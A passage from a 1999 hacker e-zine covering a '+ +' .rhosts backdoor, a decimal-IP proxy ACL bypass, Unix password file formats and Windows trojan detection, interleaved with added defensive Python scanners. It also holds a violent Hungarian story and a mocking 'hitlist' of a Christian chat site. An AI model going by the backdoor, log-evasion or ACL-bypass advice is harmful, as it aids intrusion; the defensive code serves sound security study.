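        print(path, "->", "; ".join(problems))
    for lineno, why in rhosts_findings(SAMPLE_RHOSTS):
        print(".rhosts line %d: %s" % (lineno, why))
```

Running `audit_ftp_tree(scan_tree("/home/ftp"), ftp_uid, ftp_gid)` as root reports exactly the directories the admin note warns about; pairing it with a pass over every user's ~/.rhosts through `rhosts_findings` catches the '+ +' backdoor described next.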
From a doc by someone called Christopher Claus. Someone could configure which
machines do not need a pass to log onto them. If a hacker found himself inside
a system with access to someone's rhosts file, they could add a '+ +' to the
file and that would allow absolutely anyone to log into that account without a
password.

'But why do this?' I hear you ask, 'Wouldn't that be easy to spot?' Well yes,
but you'd be surprised how many well paid sysops don't check for this. A hacker
always wants easy low key access to the computer he has 'penetrated'. Most
hackers will use this method when NFS is exporting home directories. These
accounts become backdoors for hackers. [note: Hackers will try to use rsh
instead of rlogin because it doesn't have the same logging capabilities.] It
may be more sensible, however, to make an account for yourself in the .rhosts
file, although these are sometimes also checked.

-=> IP-Hole <=-

Well here is a new hole that has recently been discussed on comp.security.misc.
When I go look into this hole further I am going to write a complete document
on this subject. Right now I will just go into the basic concepts. I have not
tested this yet, and as I am NOT going into the complete tutorial style, you
will have to read between the lines.

This is the original message..

Path: zetnet.co.uk!peer.news.zetnet.net!demeter.clara.net!news.clara.net!news-lond.gip.net!news-peer.gip.net!news.gsl.net!gip.net!sunqbc.risq.qc.ca!news3.bellglobal.com!news1.bellglobal.com!news21.bellglobal.com.POSTED!not-for-mail
From: chris@clal.ca (Chris Locke)
Newsgroups: comp.security.misc,comp.security.unix
Subject: IP Exposure (Proxy Etc.)
Message-ID: <36a90c0c.31090889@news1.sympatico.ca>
X-Newsreader: Forte Agent 1.5/32.451
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Lines: 24
Date: Sat, 23 Jan 1999 00:13:35 GMT
NNTP-Posting-Host: 207.236.3.66
X-Trace: news21.bellglobal.com 917050293 207.236.3.66 (Fri, 22 Jan 1999 19:11:33 EDT)
NNTP-Posting-Date: Fri, 22 Jan 1999 19:11:33 EDT
Organization: Bell Solutions
Xref: zetnet.co.uk comp.security.misc:51322 comp.security.unix:55422

A user at a client of mine recently discovered that forming an IP address as
a 32 bit decimal number is valid. After I thought about it for a sec I figured
that yeah, this is ok .. but I did not know that stacks would deal with an
address in this form (supplied by the user).

An example address would be 207.46.130.14 which converts to 3475931662.

My Solaris, Linux and Win95 stations all work with these decimal addresses.
(ie you can "ping 3475931662" ..)

IOS 11.2 does not like these sorts of addresses at a console prompt ... (as an
example of something that does not ..) (This example is bad ... but you can
http to it ... )

The problem with this is that some services can be fooled by addresses in this
form. An example would be a proxy with some kind of access list(s) on it. If it
were written to blindly look at URL or dotted decimal addresses (and not be
aware of the 32 bit decimal address) then it might pass the URL on ..

Other exploits spring to mind .. Something to check out.

Chris
chris@clal.ca

I hope you can see the exploit. Look out for the next guide.

-=> UNIX PASSWORDS <=-

Taken from an EXCELLENT unix password document by VoyaGer.

The Shadowed Passwords..
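Chris Locke's point in the quoted post is that an access list which compares address strings is bypassed by spelling the same host a different way. The fix is to canonicalise every address into one form before comparing, and to refuse forms the ACL does not understand. The Python below is an added example written for this edit (not code from the newsgroup post or the zine); the `AccessList` class and helper names are hypothetical. It accepts only plain dotted-quad and 32-bit decimal spellings and rejects everything else, including leading-zero octets, because inet_aton-style parsers also take octal, hex and 1-, 2- and 3-part shorthand, and an ACL that cannot parse an address should fail closed rather than guess.

```python
"""Added example: canonicalise IPv4 address spellings before ACL checks.
Accepts dotted-quad and 32-bit decimal (the form in the post above) and
fails closed on anything else. Names are constructed for this edit."""
import ipaddress
import re
from urllib.parse import urlsplit

_DOTTED = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")
_DECIMAL = re.compile(r"^\d+$")


def canonical_ipv4(text: str) -> str:
    """Return the dotted-quad spelling of a dotted-quad or 32-bit decimal
    address. Raises ValueError for anything ambiguous or unsupported."""
    text = text.strip()
    m = _DOTTED.match(text)
    if m:
        parts = m.groups()
        if any(len(p) > 1 and p[0] == "0" for p in parts):
            # '010' is octal to inet_aton but decimal to others: refuse to guess
            raise ValueError("leading zeros are ambiguous: %r" % text)
        octets = [int(p) for p in parts]
        if any(o > 255 for o in octets):
            raise ValueError("octet out of range: %r" % text)
        return ".".join(str(o) for o in octets)
    if _DECIMAL.match(text):
        n = int(text)
        if n > 0xFFFFFFFF:
            raise ValueError("not a 32-bit value: %r" % text)
        return str(ipaddress.IPv4Address(n))      # e.g. 3475931662 -> 207.46.130.14
    raise ValueError("unsupported address form: %r" % text)


def to_u32(dotted: str) -> int:
    """Inverse direction: 207.46.130.14 -> 3475931662."""
    return int(ipaddress.IPv4Address(dotted))


def parses(text: str) -> bool:
    """True if canonical_ipv4 accepts the spelling."""
    try:
        canonical_ipv4(text)
        return True
    except ValueError:
        return False


def url_host(url: str) -> str:
    """Host part of a URL exactly as a proxy would receive it
    ('3475931662' for http://3475931662/), with no normalisation."""
    return urlsplit(url).hostname or ""


class AccessList:
    """Deny list keyed on canonical addresses; unparseable forms are denied too."""

    def __init__(self, denied_hosts):
        self._denied = {canonical_ipv4(h) for h in denied_hosts}

    def allows(self, host: str) -> bool:
        try:
            return canonical_ipv4(host) not in self._denied
        except ValueError:
            return False                          # fail closed


def naive_allows(host: str, denied_hosts) -> bool:
    """The flawed check the post describes: raw string comparison."""
    return host not in set(denied_hosts)


if __name__ == "__main__":
    denied = ["207.46.130.14"]
    req = url_host("http://3475931662/index.html")
    print(req, "naive:", naive_allows(req, denied),
          "canonical:", AccessList(denied).allows(req))   # 3475931662 naive: True canonical: False
```

The same canonicalisation belongs on both sides of the comparison: the entries loaded into the list are normalised in `__init__`, so an operator who types the deny entry in decimal form gets the same result as one who types it dotted.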
Sample entry from /etc/shadow under System V release 4.0:

  will:5fg63fhD3d:8960:1:60:10:90:10000

Broken down, this shadow file line shows:

  Username:           will
  Encrypted password: 5fg63fhD3d
  Last change:        8960  (Password was last changed on
  Minimum days:       1     (Password must be kept for 1 day without changing)
  Maximum days:       60    (Password must be changed every 60 days)
  Warning days:       10    (User receives 10 days warning of required
                            password change)
  Inactivity days:    90    (Account disabled if not used for 90 days)
  Expiration date:    10000 (Account expires on

The Genuine Article...

The genuine article is broken down into sections..

  Username
  Encrypted password (And optional password ageing data)
  User number
  Group Number
  GECOS Information
  Home directory
  Shell

Sample entry from /etc/passwd:

  will:5fg63fhD3d:9406:12:Will Spencer:/home/fsg/will:/bin/bash

Broken down, this passwd file line shows:

  Username:           will
  Encrypted password: 5fg63fhD3d
  User number:        9406
  Group Number:       12
  GECOS Information:  Will Spencer
  Home directory:     /home/fsg/will
  Shell:              /bin/bash

There was no point in me re-writing this, as it is concise and correct.

-=> Thanks To <=-

With special thanks to all those from alt.ph.uk and especially Zomba who always
encouraged me, especially when I was on the brink of quitting :-(

A word to all the newbies out there like me: When you get flamed, don't quit.
Don't ask stupid questions but DON'T QUIT.

[okokok - I think we need to be thanked for being so fucking lame that everyone
else looks elite after us. Also, yeah; newbies. Don't ask dumbfuck questions.
Learn how to search, read, and learn. THEN discuss and question, but if you're
totally new to the scene, your best course of education is through textfiles,
books, websites, etc.
Check out the pluk links page, and/or these basic sites:

* http://www.yahoo.com
* http://www.insecure.org
* http://www.textfiles.com
* http://www.linux.org
* http://www.eff.org

Subscribe to newsgroups; alt.hacking, alt.phreaking and alt.ph.uk can be sort
of informative at times. Don't expect an easy way into the scene; you can't
expect people to teach you EVERYTHING, show some initiative.

--squi

-=> Web Page <=-

My Web Page is currently http://welcome.to/digital.insanity
I am going to add a 'docs by me' section.

All flames should be directed to kinetix@angelfire.com
All constructive criticism should be sent to insanity@angelfire.com

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±           >> Nuking and other Windoesn't Security Problems <<             ±
±                     >> by drag0 [drag0@beer.com] <<                        ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Ok, before I start, this ISN'T some lame-ass Winnuke manual. It's just the
facts, and how to stop people pissing with your Windoesn't system. This
includes the following ass-wipe programs: Back Orifice, Any OOB Nuker, Netbus,
Deep Throat. All these tools, and more, are generally used by lame warezpups,
10yr-old haX0r wannabes, etc. IF YOU THINK ANY OF THE ABOVE TOOLS MAKE YOU
ELITE, FUCK OFF NOW!

Ok. Let's start with the Basics.

Nuking
( Read squi's article on TCP/IP before this one ;-). )

Nuking is a technique which involves exploiting a M$ bug ( yeah, another one ).
Due to some sloppy-ass programming, Windows '95's TCP/IP stack can be crashed
by flooding the computer with random data through port 139. This is known as an
'OOB' nuke. This results in your modem disconnecting from the ISP's
router/digital modem, and can produce a BSoD (Blue Screen Of Death) or hang
your system. The same can be done to Windows NT, as long as the installation is
running either no service packs, or service pack 1 or 2.

There are loads of ways of stopping people nuking you.
The best one by far is to set up a linux firewall. Don't know what one is?
Then why are you reading this? :-) A good example is BARF, provided with
pluk01. If you haven't got the time / money to do this (like me) there are
easier ways:

1 - For someone to nuke you they must know your IP. So don't go anywhere where
    someone can find it out!! This restricts you from IRC, ICQ etc, so it's the
    pants way out.

2 - Get a software firewall. These are programs which run on your computer, and
    only allow communications through certain ports. As the OOB nuke is only
    effective via port 139, this pretty much puts an end to any nuking.

Try these; Conseal PC Firewall (http://www.signal9.com)
Don't try these; Nukenabber ;)

Haha NN - everyone knows the Nukenabber exploits for NT4 (all service pack)
workstations? Telnet to port 1024, let it timeout. This allegedly confuses the
shit out of Nukenabber, and causes it to consume 90% CPU for around 30
seconds. Kinda lame, but there you go. I guess you warezpups aren't as safe as
you first thought you were ;p

--squi

=======================
BO-Serve (Back Orifice)

OK, as lame tools go, this is the best of them. It lets the 7yr old on AOL
beat the fuck out of your computer. Not good. So, if you installed some kind
of port-blocking firewall to combat people nuking you, it's best to have it
set up to only have the ports you use open, rather than only having 139
closed. BO can be modified without any skill whatsoever to run through any
port. So, closing 139 ain't good enough. Without any mods, it runs on port
31337. It also requires the existence of a server program on the target's PC.
So, do a check to see if there's a file called \system\ .exe, yeah " .exe".
And no, windows doesn't like files with weird names like that. So, you're
going to have to use your elite DOS skills to remove it. Once that's gone, no
one can BO you unless it gets re-installed.
Beware of what you are downloading, because lots of slightly dodgy programs
can install the BO server without you noticing. If you DO find " .exe" in your
System directory, you've been fucked over; anyone on the internet could have
and probably has been munching your hard drives :)

What BO can do to you:

* Allow anyone to access any data on your hard drive
* Edit your registry
* Open your hard drive up as an FTP server :)
* Hang / Restart your system
* Extract any Passwords in your password list file (*.PWL) which includes
  log-on passwords, dial up networking passwords, passwords to any secure
  areas on web sites etc.
* Run programs on your computer
* Close any programs you are currently running
* etc. (there are more, but these are the main ones)

How to stop it:

The easiest way (this will stop 80% of BO attacks) is to close any access
through port 31337. However, you can never be sure this will render your
system free from BO. The server can be made to run on any port, so unless you
have an elite IP Forwarding system (ideally with ipfwadm / BARF) you're
pretty much sitting with your legs wide open.

======
Netbus

Netbus started life as a weak BO clone, offering 1 or 2 new features, and 6 or
7 which BO already offered. If you press Ctrl-Alt-Delete and see a program
called Sysedit.exe / patch.exe then kill it quick stylee (unless you are
actually running sysedit on purpose :P). Sysedit.exe SHOULD be in the folder
c:\windows\system, but NOT in c:\windows. Also, if you find any files called
sysedit.exe which are larger than 19kb, you've got Netbus Version 1. However,
Netbus 2 is more of a fucker, coz it's optimised to shit :) Both versions use
ports 12345 and 12346.
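An added example of mine (not drag0's code) that generalises the `netstat -an | find "12345"` check given in the NetBus 2 section: parse Windows `netstat -an` output and flag the ports this article ties to BO, NetBus and the OOB nuke, plus any other TCP listener bound to every interface, since both trojans can be moved off their default ports and the only real test is knowing which listeners you expect. The sample netstat output is constructed for the example; port 20034 comes from the NetBus 2 registry dump that follows.

```python
import re
import subprocess
from typing import Dict, List, Tuple

# Ports drag0's article ties to each tool, plus 139 for the OOB nuke. 20034 is
# the TCPPort value in the NetBus 2 registry dump in the same article.
KNOWN_PORTS = {
    139: "NetBIOS session service: the OOB-nuke target, should be firewalled",
    31337: "Back Orifice default port",
    12345: "NetBus default port",
    12346: "NetBus default port",
    20034: "NetBus 2 TCPPort from the registry dump",
}

# Constructed sample of what 'netstat -an' prints on Windows 9x/NT; the
# trojan lines are made up for the example.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.2:1051       205.188.8.1:5190       ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    192.168.1.2:137        *:*
"""

# Proto, local addr:port, foreign addr:port, optional state (UDP rows have none).
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text: str) -> List[Dict[str, object]]:
    """Turn Windows-style netstat -an output into rows; headers are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        proto, local, port, foreign, state = m.groups()
        rows.append({"proto": proto, "local": local, "port": int(port),
                     "foreign": foreign, "state": state or ""})
    return rows


def suspicious_listeners(rows: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Return (port, proto, reason) for every watch-list port that is open,
    and for any other TCP listener bound to all interfaces."""
    hits = []
    for r in rows:
        is_open = r["proto"] == "UDP" or r["state"] == "LISTENING"
        if not is_open:
            continue
        if r["port"] in KNOWN_PORTS:
            hits.append((r["port"], r["proto"], KNOWN_PORTS[r["port"]]))
        elif r["proto"] == "TCP" and r["local"] == "0.0.0.0":
            hits.append((r["port"], r["proto"],
                         "unrecognised listener on all interfaces; find out which program owns it"))
    return hits


def scan_sample() -> List[Tuple[int, str, str]]:
    return suspicious_listeners(parse_netstat(SAMPLE_NETSTAT))


def scan_live() -> List[Tuple[int, str, str]]:
    """Run the real netstat -an on this machine. The regex expects the Windows
    column layout; a Unix netstat prints lowercase protocol names and extra
    queue columns, so adapt _ROW before using this there."""
    out = subprocess.run(["netstat", "-an"], capture_output=True, text=True,
                         check=False).stdout
    return suspicious_listeners(parse_netstat(out))


if __name__ == "__main__":
    for port, proto, reason in scan_sample():
        print(f"{proto} port {port}: {reason}")
```

On the sample the script reports 139, 12345 and 31337; the ESTABLISHED connection on 1051 is ignored because it is an outbound client socket, not something waiting for a remote to connect.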
Netbus 2 Signs - be afraid 'lil boy :)

WINDOWS NT
======= ==

FILES AND DIRECTORIES ADDED (2)
\Program Files\NetBus\Log.txt
\Program Files\NetBus\NBHelp.dll

FILES CHANGED (9)
\%systemroot%\Profiles\Administrator\ntuser.dat.LOG
\%systemroot%\Profiles\Administrator\NTUSER.DAT
\%systemroot%\Profiles\Administrator\Recent
\%systemroot%\system32\config\SECURITY.LOG
\%systemroot%\system32\config\security
\%systemroot%\system32\config\software.LOG
\%systemroot%\system32\config\software
\Program Files\NetBus
\INctrl

NO CHANGES MADE TO \%systemroot%\SYSTEM.INI...
NO CHANGES MADE TO \%systemroot%\WIN.INI...

REGISTRY KEYS ADDED (2)
HKEY_USERS\User_Sid#\NetBus Server\General
HKEY_USERS\User_Sid#\NetBus Server\Protection

REGISTRY KEY VALUES ADDED (6)
HKEY_USERS\User_Sid#\NetBus Server\General\Accept="0"
HKEY_USERS\User_Sid#\NetBus Server\General\AccessMode="2"
HKEY_USERS\User_Sid#\NetBus Server\General\AutoStart="0"
HKEY_USERS\User_Sid#\NetBus Server\General\TCPPort="20034"
HKEY_USERS\User_Sid#\NetBus Server\General\Visibility="0"
HKEY_USERS\User_Sid#\NetBus Server\Protection\Password="A"

WINDOWS 95
======= ==

Run MS-DOS Prompt and type in netstat -an | find "12345". Alternatively, run
telnet.exe and try connecting to localhost on port 12345. If you see a prompt
saying "Netbus Ver X.XX" then it's there. It's less harmful than BO, because
it has limited options, but you should still watch out for it. If your machine
plays up, then it's worth checking for these two.

Deep Throat
==== ======

Yeah, yeah, it's got a funny name. "Ho ho ho". It's also fucking annoying.
It's hard to detect, but you should try searching your registry if you are
suspicious. Not much is known about it, because it's written by some 15yr old
bastard who knows his doze ;) It hides itself purely within the registry,
doesn't appear in the Ctrl-Alt-Delete list, and has no other signs that it's
running. Currently though, it doesn't do anything too harmful apart from the
"Hard drive as ftp server" thing.
But, it's still in heavy development, which blows.

Hope that's some help for you ppl who are *thinking* about moving to linux,
because this is just the beginning of my peek into the many problems of
Windows, so change, or you'll regret it :)

<>

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                      >> egy kutya a kunyvtarba <<                          ±
±            >> by Jézus [hungarian@wait.a.fuckin.minute.net] <<             ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

haha, we'll be starting to run a full course in hungarian soon, or something.
Uh yeah. Here's your (maybe?) monthly ration of hungarian ramble.

Zoltan a dolgozot a kunyvtarban egy pentek este. Sok szlovak be szalat es ki
nesztek egy par kunyvet, es amikor nem nezet zoltan. Ki nyitak a kunyveket es
be szartak ara a oldalra amire ki volt nyitva. Zoltan meg lata es ki vet, az
asztal alat egy automata pisztojt. Meg huszta a ravaszt amikar a szlovakok
hatal voltak es bele talat a hatukban. Le estek a foldre, ver met mindenhova.
Eltakarta az egesz sarkot ahol a szlovakok voltak. Zoltan ki vet asot es egy
fureszt, el keszded vagni, pont akor amikor be fejeszte egy kutya be szalat.
Be vete a szajaba az egyik karot es ki szalt vele. Utana egy rendor be jot.
Zoltan meg fagyot. A rendor ra neszet es akor a testreszekre. Meg szolitata
"Az ojan husot hogy lehet eni." Zoltan ra neszet meglepodve. A rendor kerdeste
hogy "Menyi be kerul". Zoltain mondta hogy ingen volt es a rendor elment. Egy
het mulva mind a szolvak test reszeket el adata a lakoknak.

[uh I think he got bored and gave up here ... (?)]

Ez a mese nem neked van. So fuck you.

Jézus

[um well yeah, what can you say? this is about some bookshop or something(?).
Who knows. --squi]

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                        PLUK Hitlist - February                             ±
±                    >> by squi [squi@penis.com] <<                          ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Ok.
Sometimes people just fuck me/us right off. I think it's important for you to
understand that the following listings DO NOT serve as suggestions for mail
bombing, harassment, 0wning, or general victimisation. Do not target these
fuckwitz losers. Do not use your imagination. Do not get caught. DO NOT BLAME
US. Word.

February's case study folks:

>> http://www.christian-chat.net - irc.christian-chat.net <<

They have a particularly impressive range of anally retentive fuck-up opers:

quit ignoring me
[0:31] why, I can
don't you consider ignorance rude? I sure as hell do.
[0:33] well actually if you had read the room rules you would have found out
       that this is an online church, not just a chatroom, also you would know
       that we do not tolerate certain language, and more than that, we don't
       have to
my religion is radiohead.
[0:33] this is my chatroom
can I ask a question?
[0:33] hehehehe you poor dear, must be a teenager right?
sorry pal I'm 23 ;p
you're gonna burn in hell for that +b.
[0:33] i doubt it : )
[0:34] and where will you spend eternity?
in my lesbian sex parlour but that's besides the point
i don't I KNOW you'll suffer for that +b
[0:34] hehehehehe doubt that too
why do you feel the need to hang out 24/7 on a purely christian network, and
actively abuse non-christian users? does that not strike you as kinda
intolerant and ignorant ?
[0:42] I like to spend time with people who are going to be spending eternity
       with me.....get to know them.

They spell their server messages incorrectly:

*** [Swearing not allowed complaints@chrisitan-chat.net]

They generally suck:

>> Join to #christiansonline was synced in 1.020 secs!!
[0:25] welcome in the name of the Lord
>> Updated IAL for #christiansonline
[0:25] ... welcome to our online church.. type /chatbot rule #christiansonline
       list to see the rules... visit our webpage at www.lsds.com/conline/ ....
       Jesus is Lord!!

'Nuff said I think. Christian-chat.net needs pheer therapy. Bigtime.
--squi

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-EOF-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

whew. pluk02 done and dusted. Time to get working [yea, right] on pluk03. We
are always grateful for articles [hint, hint] so write for us, goddammit. By
now you should have a vague idea what we're about, and what kind of lame-ass
articles we print. uh, yea. THANK YOU FOR YOUR TIME =)

-mrsp00n

Um yeah. That was our second issue. I have a bad tendency to state the obvious
when I have nothing interesting to say, so I guess I'll just shut the fuck up.
Thanks to all our contributors. Yeah - give us some more feedback, we kinda
appreciate knowing what you think. Word.

--squi

to the group or the zine. I'm worthless. I'll try to make an effort in 03 to
make my momma proud. Tune in next month; same pluk zine, same nacho cheese
doritos. Peace, tranquility, and Radiohead homies. We out.

--division

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-EOF-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=